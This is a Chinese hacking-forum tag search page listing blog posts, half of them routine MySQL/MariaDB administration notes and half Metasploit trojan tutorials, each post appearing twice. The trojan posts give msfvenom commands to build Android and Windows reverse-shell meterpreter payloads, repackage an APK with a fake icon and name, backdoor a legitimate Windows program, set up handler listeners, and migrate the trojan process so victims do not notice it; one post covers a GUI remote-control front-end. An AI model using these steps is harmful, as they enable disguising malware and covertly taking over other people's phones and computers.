跳转到帖子

搜索论坛

显示结果为标签'mysql'或'msfconsole'。

  • 用标签来搜索

    用逗号分隔标签类型
  • 用作者来搜索

内容类型


论坛

  • 漏洞与黑客攻击防御安全领域
    • 黑客攻防业务合作
    • 世界黑客新闻动态
    • WEB和服务器安全漏洞
    • CHT漏洞数据库
    • Linux Kali高级学习教程
    • CTF&密码学与社会工程
    • 木马病毒分析
    • 黑客世界会员中心
  • 问题讨论中心
    • 问答中心
    • 交流中心
  • 编程开发
    • 各种编程技术
    • ios /安卓开发
  • CHT官方团队介绍及比赛制度
    • CTF攻防系统[供会员使用]
    • 积分商场
    • 积分跳马系统
    • 积分统计系统

产品组

  • Hacker attack and defense security hardware series
  • Internet Security Book Recommendations

博客

没有结果。

没有结果。

类别

  • Hacker Attack and Defense & Network Security Videos

查找结果在…

查找包含的结果…


创建日期

  • 开始

    结束


最后更新

  • 开始

    结束


按数量过滤…

注册日期

  • 开始

    结束


用户组


About Me

找到16个结果

  1. 中午还在午休,在以前公司上班的同时发来消息,说是数据库挂掉了。让我帮他看看。嗯……(虽然已离职,但是感情还是有的吗。)发来截图。的确是数据库挂掉了。 然后,开始了我一下午的填坑记。 恩嫩,mmp先看看能不能启动数据库。执行命令: service mysqld start恩 ,报错。 提示错误:/var/lib/mysql/mysql.cock 估计是mysql.sock文件丢失。然后已在遵循先百度后google的原则,找了半天还是无法解决问题。过程太艰苦。就不说了…… 查看数据库日志 恩恩 ,早上11:05分挂掉的。资讯了下十一点的时候有么有对数据库操作。说着是新增了虚拟主机来着,对数据库没有操作。这个就怪了…… 没事,我们接着找原因,既然是mysql.sock文件丢失,能不能从其他地方复制一份呢? 结果还是失败 mmp。想着不行就直接从装数据库吧,但是他那边没有备份,这时只能用一首《凉凉》来形容当时的心境了。好吧!不放弃接着找原因。 对当前系统分析 系统:centos7数据库:mariadb引擎: apache 等等,centos7中。使用mariadb代替了mysql。这也许不是mysql的问题而是mariadb的问题。 OK,我们试着启动mariadb service mariadb startOK,伟大的mysql终于启动了 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/161.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  2. 1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 -p用户密码 (如连接远程数据库 :mysql -h192.168.xxx.xxx -uroot -p123)  mysql -u用户名 -p用户密码(如连接本地数据库:mysql -uroot -p123) 4.显示命令:数据库版本信息:show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构: describe 表名;查看当前使用的数据库 select database(); 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/163.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  3. 中午还在午休,在以前公司上班的同时发来消息,说是数据库挂掉了。让我帮他看看。嗯……(虽然已离职,但是感情还是有的吗。)发来截图。的确是数据库挂掉了。 然后,开始了我一下午的填坑记。 恩嫩,mmp先看看能不能启动数据库。执行命令: service mysqld start恩 ,报错。 提示错误:/var/lib/mysql/mysql.cock 估计是mysql.sock文件丢失。然后已在遵循先百度后google的原则,找了半天还是无法解决问题。过程太艰苦。就不说了…… 查看数据库日志 恩恩 ,早上11:05分挂掉的。资讯了下十一点的时候有么有对数据库操作。说着是新增了虚拟主机来着,对数据库没有操作。这个就怪了…… 没事,我们接着找原因,既然是mysql.sock文件丢失,能不能从其他地方复制一份呢? 结果还是失败 mmp。想着不行就直接从装数据库吧,但是他那边没有备份,这时只能用一首《凉凉》来形容当时的心境了。好吧!不放弃接着找原因。 对当前系统分析 系统:centos7数据库:mariadb引擎: apache 等等,centos7中。使用mariadb代替了mysql。这也许不是mysql的问题而是mariadb的问题。 OK,我们试着启动mariadb service mariadb startOK,伟大的mysql终于启动了 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/161.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  4. 一:登录数据库格式:mysql -u 用户名 -p mysql -u root -p 数据密码后进入数据库: 二:显示数据库:show databases; 三:显示表use dvwa; #选择数据库 show tables; #显示表 四:查询 select * from users; 五:新建数据库create database xxx;xxx为数据库的名称 六:删除数据库drop database xxx; 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/165.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  5. 1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 -p用户密码 (如连接远程数据库 :mysql -h192.168.xxx.xxx -uroot -p123)  mysql -u用户名 -p用户密码(如连接本地数据库:mysql -uroot -p123) 4.显示命令:数据库版本信息:show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构: describe 表名;查看当前使用的数据库 select database(); 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/163.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  6. 一:登录数据库格式:mysql -u 用户名 -p mysql -u root -p 数据密码后进入数据库: 二:显示数据库:show databases; 三:显示表use dvwa; #选择数据库 show tables; #显示表 四:查询 select * from users; 五:新建数据库create database xxx;xxx为数据库的名称 六:删除数据库drop database xxx; 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/165.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  7. 一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/184.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  8. 一:生成一个android木马命令: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=5555 R > bbskali.apk如图,将会生成一个名为bbskali的apk 二:反编译生成的木马命令: apktool d bbskali.apk 三:修改木马图片 1.1:先下载一个格式为png格式的图标。1.2:在res新建 drawable 将png格式图片放到里面 1.3:修改AndroidManifest.xml文件,打开文件在里面新添一句代码 <application android:icon="@drawable/icon" android:label="@string/app_name">将原来的<application android:label="@string/app_name">删除 修改完成后,保存文件。 三:修改木马的名称打开文件res-values-strings.xml文件,修改为你自己的名称 四:回编木马命令: apktool b bbskali 新的木马文件生成在dist目录下,ok,现在木马还不能用。我们需要重新签名。 五:木马签名将生的木马复制到本地,我们用安卓签名软件进行签名 六:手机安装木马效果如下: 安装运行 七:运行木马 终端获得shell 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/184.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  9. 登录数据库mysql -u root -p显示数据库show databases;选择数据库use dbname;显示数据库中的表show tables;新建数据库create database dbname;删除数据库dorp database dbname;显示表结构desc dbname;查询数据库selcet *from dbname; 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/264.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  10. 登录数据库mysql -u root -p显示数据库show databases;选择数据库use dbname;显示数据库中的表show tables;新建数据库create database dbname;删除数据库dorp database dbname;显示表结构desc dbname;查询数据库selcet *from dbname; 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/264.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  11. 一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/300.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  12. 一:利用msfconsole生成windows木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -e x86/33 -f exe -o yue.exe参数说明: -p:指定生成的类型lhost:攻击者的ip地址lport:攻击者的端口-e:木马的编码方式-f:生成的文件格式-o:输出文件 二:利用msfconsole攻击配置参数: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.129 set LPORT 4444 exploit 三:windows运行木马 成功得到反弹 具体攻击细节,我们将会在第二节演示! 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/300.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  13. 在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。首先我们生成一个木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。 启动msfconsole并设置参数use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.195 set LPORT 5555 exploit运行软件,成功获得shell 转移进程首先命令ps查看当前windows下运行的进程有哪些。 这时,我们要记录下要转移程序的pid值 比如,我想我木马的进程转移到txt文档程序下。执行下面命令。 migrate 6296 使用 espiause espia 这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/531.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  14. 在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。首先我们生成一个木马msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。 启动msfconsole并设置参数use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.232.195 set LPORT 5555 exploit运行软件,成功获得shell 转移进程首先命令ps查看当前windows下运行的进程有哪些。 这时,我们要记录下要转移程序的pid值 比如,我想我木马的进程转移到txt文档程序下。执行下面命令。 migrate 6296 使用 espiause espia 这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/531.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  15. Kage,一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后,给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明: -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址(很重要,要是kage和msf在同一台电脑,用0.0.0.0即127.0.0.1) 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马,也可以在平台上生成木马,根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马,查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~ 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/1263.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
  16. Kage,一个把msf变成可视化远控平台的工具。项目地址https://github.com/WayzDev/Kage/ 下载安装点我下载哈~ 下载后,给予运行权限。 启动服务msfrpcd -U msf -P 123456 -a 0.0.0.0 参数说明: -U: 登录kage的账号 -P:登录kage的密码 -a: msf的ip地址(很重要,要是kage和msf在同一台电脑,用0.0.0.0即127.0.0.1) 启动程序 并登陆 ./Kage.0.1.1-beta_linux.AppImage 输入账号和密码 以及对应的端口 登录成功后如下所示 我们可以利用命令生成木马,也可以在平台上生成木马,根据自己的具体情况来看。 配置监听 配置完成后点击创建 在目标端 成功运行生成的木马,查看会话。 各种骚操作系统信息 文件信息 路由信息 装B完成 扯呼~~~ 版权属于:逍遥子大表哥 本文链接:https://blog.bbskali.cn/1263.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    ×
    ×
    • 创建新的...